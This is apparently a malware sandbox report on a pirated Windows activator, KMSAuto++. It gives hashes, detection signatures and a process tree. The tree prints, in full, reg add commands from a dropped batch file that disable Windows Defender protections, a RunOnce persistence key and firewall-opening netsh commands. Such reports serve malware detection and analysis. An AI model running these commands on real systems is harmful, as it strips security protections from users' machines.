Analysis
max time kernel: 106s
max time network: 124s
platform: windows7_x64
resource: win7-20221111-es
resource tags: arch:x64, arch:x86, image:win7-20221111-es, locale:es-es, os:windows7-x64, system:windows
submitted: 06-02-2023 17:00
Static task: static1
Behavioral task: behavioral1
  Sample: KMSAuto++v1.6.4.exe
  Resource: win7-20221111-es
Behavioral task: behavioral2
  Sample: KMSAuto++v1.6.4.exe
  Resource: win10v2004-20220812-es
General
Target: KMSAuto++v1.6.4.exe
Size: 718.9MB
MD5: ef8cd375fdc780a87dbf601860994ab9
SHA1: b0aac6fb4006091219ba82a5838e810e0e27beba
SHA256: a6856516f42de63846610b121a0585472e252d40ffcaddba201c3b5fa2abb520
SHA512: 52db73a1bc0df076f74ed5fcb4d50ca7e46de6b7ee57cb7ee0223c96635dd01e4cafa403079fdeac25a219d402f5fdca608f76c8ed689540cac0d6c11b44c417
SSDEEP: 786432:yo0mvb9vOggaeuNz9jMWZZ7vHMH85G1p14NPlT2sp:yavx2ggaL11MccpyPR2
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
  Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
  Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
  Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
  Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Modifies security service 2 TTPs 1 IoCs
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | reg.exe
Creates new service(s) 1 TTPs
Modifies Windows Firewall 1 TTPs 10 IoCs
Processes:
  pid | process
  1516 | netsh.exe
  1916 | netsh.exe
  844 | netsh.exe
  652 | netsh.exe
  480 | netsh.exe
  1336 | netsh.exe
  1760 | netsh.exe
  1308 | netsh.exe
  896 | netsh.exe
  1156 | netsh.exe
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\KMSEmulator\ImagePath = "\"C:\\Users\\Admin\\KMSAuto_Files\\bin\\KMSSS.exe\" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP" | kmsauto++v1.6.4.exe
Stops running service(s) 3 TTPs
Executes dropped EXE 7 IoCs
Processes:
  pid | process
  1880 | kms driver.exe
  520 | kmsauto++v1.6.4.exe
  1596 | microsoft tap driver.exe
  1816 | svchost32.exe
  1652 | signtool.exe
  1904 | KMSSS.exe
  896 | KMSSS.exe
Loads dropped DLL 18 IoCs
Processes:
  pid | process
  1984 | KMSAuto++v1.6.4.exe (16 identical entries)
  520 | kmsauto++v1.6.4.exe (2 identical entries)
UPX packed file
Processes:
  resource | yara_rule
  \Users\Admin\kmsauto++v1.6.4.exe | upx
  \Users\Admin\kmsauto++v1.6.4.exe | upx
  C:\Users\Admin\kmsauto++v1.6.4.exe | upx
  \Users\Admin\kmsauto++v1.6.4.exe | upx
  \Users\Admin\kmsauto++v1.6.4.exe | upx
  \Users\Admin\microsoft tap driver.exe | upx
  \Users\Admin\microsoft tap driver.exe | upx
  \Users\Admin\microsoft tap driver.exe | upx
  C:\Users\Admin\microsoft tap driver.exe | upx
  behavioral1/memory/520-90-0x0000000000400000-0x0000000001713000-memory.dmp | upx
  behavioral1/memory/1596-93-0x0000000000400000-0x000000000041F000-memory.dmp | upx
  C:\Users\Admin\kmsauto++v1.6.4.exe | upx
  behavioral1/memory/520-134-0x0000000000400000-0x0000000001713000-memory.dmp | upx
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | svchost32.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchost32.exe = "C:\\Users\\Admin\\svchost32.exe" | svchost32.exe
Launches sc.exe 6 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  980 | sc.exe
  1048 | sc.exe
  1380 | sc.exe
  1880 | sc.exe
  2012 | sc.exe
  1244 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 1 IoCs
Processes:
  pid | pid_target | process | target process
  1516 | 1880 | WerFault.exe | kms driver.exe
Modifies system certificate store
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | signtool.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 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 | signtool.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
  pid | process
  1816 | svchost32.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
  pid | process
  520 | kmsauto++v1.6.4.exe (4 identical entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description | pid | process
  pid 1416 wmic.exe: the following sequence of 20 token privileges is recorded twice (40 entries):
    Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  pid 1808 wmic.exe: the same sequence of 20 once, followed by its first four again (24 entries):
    Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
  pid | process
  520 | kmsauto++v1.6.4.exe (3 identical entries)
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
  pid | process
  520 | kmsauto++v1.6.4.exe (3 identical entries)
Suspicious use of WriteProcessMemory 64 IoCs
Processes (identical rows collapsed, with the number of entries in parentheses):
  description | pid | process | target process
  PID 1984 wrote to memory of 1880 | 1984 | KMSAuto++v1.6.4.exe | kms driver.exe (4)
  PID 1984 wrote to memory of 520 | 1984 | KMSAuto++v1.6.4.exe | kmsauto++v1.6.4.exe (4)
  PID 1984 wrote to memory of 1596 | 1984 | KMSAuto++v1.6.4.exe | microsoft tap driver.exe (4)
  PID 1596 wrote to memory of 1736 | 1596 | microsoft tap driver.exe | cmd.exe (4)
  PID 1984 wrote to memory of 1816 | 1984 | KMSAuto++v1.6.4.exe | svchost32.exe (4)
  PID 1736 wrote to memory of 928 | 1736 | cmd.exe | reg.exe (3)
  PID 1736 wrote to memory of 1976 | 1736 | cmd.exe | reg.exe (3)
  PID 520 wrote to memory of 1144 | 520 | kmsauto++v1.6.4.exe | cmd.exe (4)
  PID 1736 wrote to memory of 1020 | 1736 | cmd.exe | reg.exe (3)
  PID 1736 wrote to memory of 1428 | 1736 | cmd.exe | reg.exe (3)
  PID 1736 wrote to memory of 1924 | 1736 | cmd.exe | reg.exe (3)
  PID 1736 wrote to memory of 1156 | 1736 | cmd.exe | reg.exe (3)
  PID 520 wrote to memory of 1652 | 520 | kmsauto++v1.6.4.exe | signtool.exe (4)
  PID 1736 wrote to memory of 1416 | 1736 | cmd.exe | reg.exe (3)
  PID 1736 wrote to memory of 480 | 1736 | cmd.exe | reg.exe (3)
  PID 1736 wrote to memory of 1276 | 1736 | cmd.exe | reg.exe (3)
  PID 1736 wrote to memory of 544 | 1736 | cmd.exe | reg.exe (3)
  PID 1736 wrote to memory of 972 | 1736 | cmd.exe | reg.exe (3)
  PID 1736 wrote to memory of 2040 | 1736 | cmd.exe | reg.exe (3)
Processes
Tree depth is shown as [N] and by indentation; each entry gives the image path, then the command line, then the signatures it triggered.

[1] C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe
    "C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\kms driver.exe
      "C:\Users\Admin\kms driver.exe"
      - Executes dropped EXE
    [3] C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 1880 -s 584
        - Program crash
  [2] C:\Users\Admin\kmsauto++v1.6.4.exe
      "C:\Users\Admin\kmsauto++v1.6.4.exe"
      - Sets service image path in registry
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSAuto "C:\Users\Admin\AppData\Local\Temp\KMSAuto.tmp" /Y
    [3] C:\Users\Admin\AppData\Local\Temp\signtool.exe
        "C:\Users\Admin\AppData\Local\Temp\signtool.exe" verify /v /ph /sha1 648384a4dee53d4c1c87e10d67cc99307ccc9c98 "C:\Users\Admin\kmsauto++v1.6.4.exe"
        - Executes dropped EXE
        - Modifies system certificate store
    [3] C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" path Win32_NetworkAdapter get ServiceName /value /FORMAT:List
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%') get Name, Description, ID, PartialProductKey, LicenseStatus, KeyManagementServiceMachine, KeyManagementServicePort, VLRenewalInterval, GracePeriodRemaining, KeyManagementServicePort, KeyManagementServiceProductKeyID /FORMAT:List
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" path SoftwareLicensingService get Version /value /FORMAT:List
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
      [4] C:\Windows\system32\netsh.exe
          Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
          - Modifies Windows Firewall
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
      [4] C:\Windows\system32\netsh.exe
          Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
          - Modifies Windows Firewall
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
      [4] C:\Windows\system32\netsh.exe
          Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
          - Modifies Windows Firewall
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
      [4] C:\Windows\system32\netsh.exe
          Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
          - Modifies Windows Firewall
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
      [4] C:\Windows\system32\sc.exe
          sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
          - Launches sc.exe
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c sc.exe start KMSEmulator
      [4] C:\Windows\system32\sc.exe
          sc.exe start KMSEmulator
          - Launches sc.exe
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
      [4] C:\Windows\system32\cscript.exe
          cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
    [3] C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%' And PartialProductKey is Not NULL) get Name, Description, ID, PartialProductKey /FORMAT:List
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
      [4] C:\Windows\system32\cscript.exe
          cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
    [3] C:\Windows\system32\slui.exe
        "C:\Windows\Sysnative\slui.exe" 0x2a 0xC004C003
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c sc.exe stop KMSEmulator
      [4] C:\Windows\system32\sc.exe
          sc.exe stop KMSEmulator
          - Launches sc.exe
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c sc.exe delete KMSEmulator
      [4] C:\Windows\system32\sc.exe
          sc.exe delete KMSEmulator
          - Launches sc.exe
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
      [4] C:\Windows\system32\netsh.exe
          Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
          - Modifies Windows Firewall
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
      [4] C:\Windows\system32\netsh.exe
          Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
          - Modifies Windows Firewall
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
      [4] C:\Windows\system32\netsh.exe
          Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
          - Modifies Windows Firewall
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
      [4] C:\Windows\system32\netsh.exe
          Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
          - Modifies Windows Firewall
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
      [4] C:\Windows\system32\netsh.exe
          Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
          - Modifies Windows Firewall
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
      [4] C:\Windows\system32\netsh.exe
          Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
          - Modifies Windows Firewall
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
      [4] C:\Windows\system32\sc.exe
          sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
          - Launches sc.exe
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c sc.exe start KMSEmulator
      [4] C:\Windows\system32\sc.exe
          sc.exe start KMSEmulator
          - Launches sc.exe
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
      [4] C:\Windows\System32\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
      [4] C:\Windows\system32\cscript.exe
          cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
    [3] C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%' And PartialProductKey is Not NULL) get Name, Description, ID, PartialProductKey /FORMAT:List
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
      [4] C:\Windows\system32\cscript.exe
          cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
    [3] C:\Windows\system32\slui.exe
        "C:\Windows\Sysnative\slui.exe" 0x2a 0xC004C003
  [2] C:\Users\Admin\microsoft tap driver.exe
      "C:\Users\Admin\microsoft tap driver.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3EF5.tmp\3F05.tmp\3F16.bat "C:\Users\Admin\microsoft tap driver.exe""
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
          - Modifies Windows Defender Real-time Protection settings
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
          - Modifies Windows Defender Real-time Protection settings
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
          - Modifies Windows Defender Real-time Protection settings
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
          - Modifies Windows Defender Real-time Protection settings
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
          - Modifies Windows Defender Real-time Protection settings
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      [4] C:\Windows\system32\reg.exe
